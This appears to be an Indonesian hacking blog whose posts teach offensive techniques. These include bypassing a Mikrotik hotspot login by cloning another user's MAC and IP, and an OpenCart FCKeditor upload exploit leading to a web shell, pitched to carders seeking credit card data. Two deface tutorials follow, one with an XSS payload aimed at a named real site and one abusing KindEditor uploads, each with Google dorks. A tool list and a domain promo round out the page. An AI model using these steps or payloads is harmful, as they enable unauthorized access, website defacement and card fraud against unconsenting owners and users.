2 Bypass password Mikrotik

+=x[ KRESS|DaiLy ]x=+
 Label : Cracker
 
Tampa basa-basi saya akan membahas gimana cara membypass password mikrotik atau menyusup ke jaringan hotspot yg bermikrotik tampa minta password kesana-kemari hohoho.
1. required software :
 #yang pake win7, habis nginstal netcut, instal juga http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
2. konekin laptop kamu ke hotspotnya
3. jalanin netcut nya
4. Pilih LAN Card / NIC yang kamu pake dengan mengklik menu Choice NetCard
5. Terus pindah ke menu utama, pilih network orang lain, jangan pilih network kamu sendiri atwpun network server
6. Pindah dan copy IP address dan MAC address dengan klik print table dan copy ke notepad.
7. Paste di notepad, terus edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangin tanda [:] ampe jadi 00265E60811C. Nilai ini yang akan agan pake buat ngubah MAC address agan.
8. wokeyh, terus disable dulu wireless LAN agan. Buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isikan dengan nilai tadi, misalnya 00265E60811C.
9. Set IP wireless LAN dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
10. wew , enable kan wireless LAN kamu, dan sekarang kamu connect tanpa menu login (tanpa tanya2 orang dulu pastinya.
NB: Untuk mengetahui DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt C:\>ipconfig/all



Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  
 
Like My FansFage : CLICK HERE
Gabung di Group Facebook Kress-Daily : CLICK HERE

0 Opencart Remote File Upload Vulnerability

+=x[ KRESS|DaiLy ]x=+
http://2.bp.blogspot.com/-7tO4evHEgv8/TQXetCplCII/AAAAAAAABwQ/U1d56pq72Q4/s1600/DSC00251.JPG
Buat para carder di dunia, memang sulit mencari card credit untuk saat ini, tapi masih banyak exploit yang masih dapat anda gunakan untuk mencari itu semua, seperti teman teman code security yang masih mencari dan menggila masalah credit card dan paypal.

Lalu seperti apa exploitnya? mungkin beberapa waktu lalu sangat banyak orang mencari oscommerce, sering saya mendapatkan web yang Vulnerability dengan exploit lama. 

Langusng aja biar teman teman dapat mencoba dengan exploit buat para carder di mana saja.


#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php


# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
 

#Demo : 

  1. http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# 
  2. http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
     
    Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  
     
    Like My FansFage : CLICK HERE
    Gabung di Group Facebook Kress-Daily : CLICK HERE

0 Cara Deface Website Menggunakan Teknik XSS Vulnerability


+=x[ KRESS|DaiLy ]x=+



http://cirebon-cyber4rt.blogspot.com/
Udah lama ngga posting tentang tutordefacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  
 
Like My FansFage : CLICK HERE
Gabung di Group Facebook Kress-Daily : CLICK HERE

1 Domain Free web.id & co.id

 
+=x[ KRESS|DaiLy ]x=+
Berikut ini yang akan Anda dapatkan:


- Situs web gratis yang mudah diperbarui dan diganti sesuai dengan keinginan Anda


- Alamat web .co.id & .web.id gratis selama satu tahun.*


- Tips dan pelatihan yang berkelanjutan 


- Uji coba AdWords senilai Rp. 500.000,-





Berikut ini adalah 2 pilihan yang ditawarkan:


Pilihan 1: Jika Anda ingin mendapatkan nama domain .co.id, Anda wajib menyertakan KTP dan SIUP/TDP/Akte Notaris


Pilihan 2: Anda bisa mendapatkan nama domain .web.id dengan hanya menyertakan KTP atau SIM atau Passport.





Sebelum Anda memulai menbuat Website sendiri dan registrasi nama domain, pastikan Anda siap dengan dokumen yang dibutuhkan.





- Untuk Daftar Disini


- Setelah register ikuti step - step registrasi hingga selesai registernya.


- Klik dapatkan domain dan publikasikan , Setelah itu anda akan masuk ke melsa.id untk register domainnya.


- Daftarlah sesuai tata cara pendaftaran di web itu tetapi ingat harus punya nomor KTP atau SIM (Hanya Indonesia).


- Setelah daftar, nanti muncul tampilan pada Email kamu yg menyatakan "Pendaftaran Email disiapkan 24 jam......"


- Setelah menunggu, nanti muncul notifikasi bahwa domain sudah jadi, itu artinya berhasil




Selamat Mencoba! 


Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  
 
Like My FansFage : CLICK HERE

Gabung di Group Facebook Kress-Daily : CLICK HERE

0 Software Hacking & Cracking


+=x[ KRESS|DaiLy ]x=+
1. Nmap

Nmap ("Network Mapper") adalah sebuah utilitas open source gratis untuk eksplorasi jaringan atau audit keamanan. Ia dirancang untuk cepat memindai jaringan besar, meskipun bekerja dengan baik terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang baru untuk menentukan apa host yang tersedia pada jaringan, layanan apa (nama aplikasi dan versi) host-host yang menawarkan, apa sistem operasi (dan versi OS) mereka sedang berjalan, apa jenis paket filter / firewall sedang digunakan, dan puluhan karakteristik lain. Nmap berjalan pada sebagian besar jenis komputer dan baik konsol dan versi grafis yang tersedia. Nmap bebas dan open source.

Dapat digunakan oleh pemula (-sT) atau oleh pro sama (-packet_trace). Sebuah alat yang sangat serbaguna, setelah Anda memahami hasil.

2. Nessus Keamanan jauh Scanner

Baru-baru ini pergi closed source, tetapi masih dasarnya bebas. Bekerja dengan kerangka kerja client-server.

Nessus adalah kerentanan yang paling populer di dunia pemindai yang digunakan di lebih dari 75.000 organisasi di seluruh dunia. Banyak organisasi terbesar di dunia ini menyadari penghematan biaya signifikan dengan menggunakan Nessus untuk melakukan audit perusahaan perangkat bisnis penting dan aplikasi.

3. John the Ripper

Ya, JTR 1,7 baru-baru ini dirilis!

John the Ripper merupakan password cracker yang cepat, saat ini tersedia untuk banyak rasa Unix (11 secara resmi didukung, tidak termasuk arsitektur yang berbeda), DOS, Win32, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksi password Unix lemah. Selain beberapa crypt (3) sandi jenis hash yang paling umum ditemukan di berbagai rasa Unix, didukung di luar kotak adalah Kerberos AFS dan Windows LM hash NT/2000/XP/2003, ditambah beberapa lagi dengan patch berkontribusi.

4. Nikto

Nikto adalah Open Source (GPL) web server scanner yang melakukan tes komprehensif terhadap web server untuk beberapa item, termasuk lebih dari 3200 file yang berpotensi berbahaya / CGIS, versi di lebih dari 625 server, dan masalah versi tertentu di lebih dari 230 server. Item Scan dan plugins sering diperbarui dan dapat diupdate secara otomatis (jika diinginkan).

Nikto adalah scanner CGI yang baik, ada beberapa alat lain yang cocok dengan Nikto (fokus pada sidik jari http atau Google hacking / info dll pengumpulan, artikel lain untuk hanya mereka).

5. SuperScan

Powerfull TCP port scanner, pinger, resolver. SuperScan 4 merupakan update dari alat scanning port yang sangat populer Windows, SuperScan.

Jika Anda membutuhkan alternatif untuk nmap pada Windows dengan antarmuka yang layak, saya sarankan Anda memeriksa ini keluar, itu cukup bagus.

6. p0f

P0f v2 pasif OS serbaguna alat sidik jari. P0f dapat mengidentifikasi sistem operasi pada:

- Mesin yang terhubung ke komputer anda (SYN mode),
- Mesin Anda terhubung ke (modus + SYN ACK),
- Mesin Anda tidak dapat terhubung ke (RST + modus),
- Mesin yang dapat mengamati komunikasi Anda.

Pada dasarnya dapat sidik jari apapun, hanya dengan mendengarkan, hal itu tidak membuat APAPUN koneksi aktif ke mesin target.

7. Wireshark (Formely Ethereal)

Wireshark adalah +-jaringan berbasis protokol analyzer GTK, atau pelacak, yang memungkinkan Anda menangkap dan interaktif menelusuri isi dari frame jaringan. Tujuan dari proyek ini adalah untuk membuat analisa komersial berkualitas untuk Unix dan memberikan fitur-fitur Wireshark yang hilang dari sumber tertutup sniffers.

Karya besar pada kedua Linux dan Windows (dengan GUI), mudah digunakan dan dapat merekonstruksi TCP / IP Streaming! Akan melakukan tutorial tentang Wireshark nanti.

8. Yersinia

Yersinia adalah alat jaringan yang dirancang untuk mengambil keuntungan dari beberapa weakeness dalam protokol layer yang berbeda 2. Hal ini berpura-pura menjadi kerangka yang solid untuk menganalisis dan menguji jaringan dan sistem dikerahkan. Saat ini, protokol jaringan berikut ini diimplementasikan: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Router Protokol Hot siaga (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

9. Eraser

Eraser merupakan alat keamanan yang canggih (untuk Windows), yang memungkinkan Anda untuk sepenuhnya menghapus data sensitif dari hard drive Anda dengan Timpa beberapa kali dengan pola yang dipilih dengan cermat. Bekerja dengan Windows 95, 98, ME, NT, 2000, XP dan DOS. Penghapus adalah perangkat lunak gratis dan kode sumbernya dirilis di bawah GNU General Public License.

Sebuah alat yang sangat baik untuk menjaga data Anda benar-benar aman.

10. Putty

Putty adalah implementasi bebas dari Telnet dan SSH untuk Win32 dan platform Unix, bersama dengan xterm terminal emulator. Harus memiliki untuk setiap h4 × 0r ingin telnet atau SSH dari Windows tanpa harus menggunakan default MS jelek klien baris perintah.

11. LCP

Tujuan utama dari program LCP user account password audit dan pemulihan di Windows NT/2000/XP/2003. Akun informasi impor, Sandi pemulihan, kekuatan distribusi sesi Brute, kilatan komputasi.

Sebuah alternatif gratis baik untuk L0phtCrack.

LCP sempat disebutkan dalam Tabel banyak membaca kita Rainbow dan artikel RainbowCrack.

12. Cain dan Abel

Saya pribadi favorit untuk password cracking apapun.

Cain & abel adalah pemulihan password alat untuk Sistem Operasi Microsoft. Hal ini memungkinkan pemulihan mudah berbagai jenis password oleh mengendus jaringan, cracking password terenkripsi menggunakan serangan Dictionary, Brute-Force dan Kriptoanalisis, rekaman percakapan VoIP, orak-arik decoding password, mengungkapkan kotak password, mengungkap password cache dan menganalisis protokol routing. Program ini tidak mengeksploitasi kerentanan perangkat lunak atau bug yang tidak bisa diperbaiki dengan sedikit usaha.

13. Kismet

Kismet adalah 802.11 layer2 jaringan nirkabel detektor, sniffer, dan sistem deteksi intrusi. Kismet akan bekerja dengan kartu nirkabel yang mendukung modus pemantauan (rfmon) baku, dan dapat mengendus 802.11b, 802.11a, 802.11g dan lalu lintas.

Sebuah alat nirkabel yang baik asalkan kartu Anda mendukung rfmon (mencari emas orinocco).

14. Netstumbler

Ya sebuah alat nirkabel yang layak untuk Windows! Sayangnya tidak sekuat itu rekan-rekan Linux, tetapi mudah untuk digunakan dan memiliki antarmuka yang bagus, baik untuk dasar-dasar perang mengemudi.

NetStumbler adalah alat untuk Windows yang memungkinkan Anda untuk mendeteksi Wireless Local Area Networks (WLAN) menggunakan 802.11b, 802.11a dan 802.11g. Ia memiliki banyak kegunaan:

Pastikan bahwa jaringan anda adalah mengatur cara yang Anda inginkan.
Cari lokasi dengan cakupan miskin di WLAN Anda.
Mendeteksi jaringan lain yang mungkin menyebabkan gangguan pada jaringan Anda.
Deteksi yang tidak sah "nakal" akses poin di tempat kerja Anda.
Bantuan bertujuan antena directional untuk link jarak jauh WLAN.
Gunakan bersenang-senang untuk WarDriving.

15. hping

Untuk menyelesaikan, sesuatu yang sedikit lebih maju jika Anda ingin menguji TCP / IP paket monyet keterampilan Anda.

hping adalah baris perintah berorientasi paket TCP / IP assembler / analyzer. Antarmuka terinspirasi untuk perintah unix ping, tetapi hping tidak hanya dapat mengirimkan permintaan ICMP echo. Ini mendukung TCP, UDP, protokol ICMP dan RAW-IP, memiliki modus traceroute, kemampuan untuk mengirim file antara saluran tertutup, dan banyak fitur lainnya.

Untuk download software nya gunakan SE Google.
 
 
Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  Like My FansFage : CLICK HERE

Gabung di Group Facebook Kress-Daily : CLICK HERE
 

1 Cara Deface Website Dengan Teknik Web KindEditor

Ada yang baru nih :D

kali ini saya akan share tutorial Cara Deface Website Dengan Teknik Web KindEditor. Bagi yang suka maen empes-empesan, Ane punya tutorial deface yang ngga terlalu sulit nih, anak SD juga kayanya bisa wkwk :p

Ok, Langsung aja kita mulai defacenya ^^

Masukan Dorknya ke kotak pencarian Google :
  • inurl:examples/uploadbutton.html
  • inurl:kindeditor
Exploit :
  • http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html
1. Kalo web target udah dapet, kita klik upload,


2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML ane... Cireboncyber4rt.html


3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL.


4. Kemudian kalo sudah, tekan Enter.
5. Taraaa... :D

Gimana, mudahkan? hehehe... Bagi agan-agan yang masih bingung, silahkan bisa pakai demo upload buttonnya yang sudah saya dapatkan dibawah ini :
Semoga tutorial diatas tentang Cara Deface Website Dengan Teknik Web KindEditor bisa bermanfaat bagi agan-agan sekalian, kurang lebihnya saya mohon maaf, Wassalam.

Update : Bagi agan-agan yang butuh kode HTML Defacenya, saya sudah sediakan Klik Disini. Kalian hanya perlu mengeditnya kembali dengan menggunakan Notepad++.

Source: Hacker Newbie
Add My Facebook  : Kress24angga@hotmail.com / KLIK DISINI  Like My FansFage : CLICK HERE

Gabung di Group Facebook Kress-Daily : CLICK HERE